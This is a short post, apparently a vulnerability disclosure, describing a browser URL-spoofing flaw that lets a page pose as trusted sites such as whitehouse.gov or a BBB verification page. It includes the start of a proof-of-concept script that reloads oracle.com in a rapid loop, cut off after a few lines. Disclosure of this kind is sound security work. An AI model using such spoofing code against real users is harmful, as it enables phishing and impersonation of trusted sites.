Posted by David Leo on Jun 30

Impact:
The “click to verify” thing is completely broken…
Anyone can be “BBB Accredited Business” etc.
You can make whitehouse.gov display “We love Islamic State” 🙂

Note:
No user interaction on the fake page.

Code:
***** index.html
<script>
function next()
{
w.location.replace(‘http://www.oracle.com/index.html?’+n);n++;
setTimeout(“next();”,15);…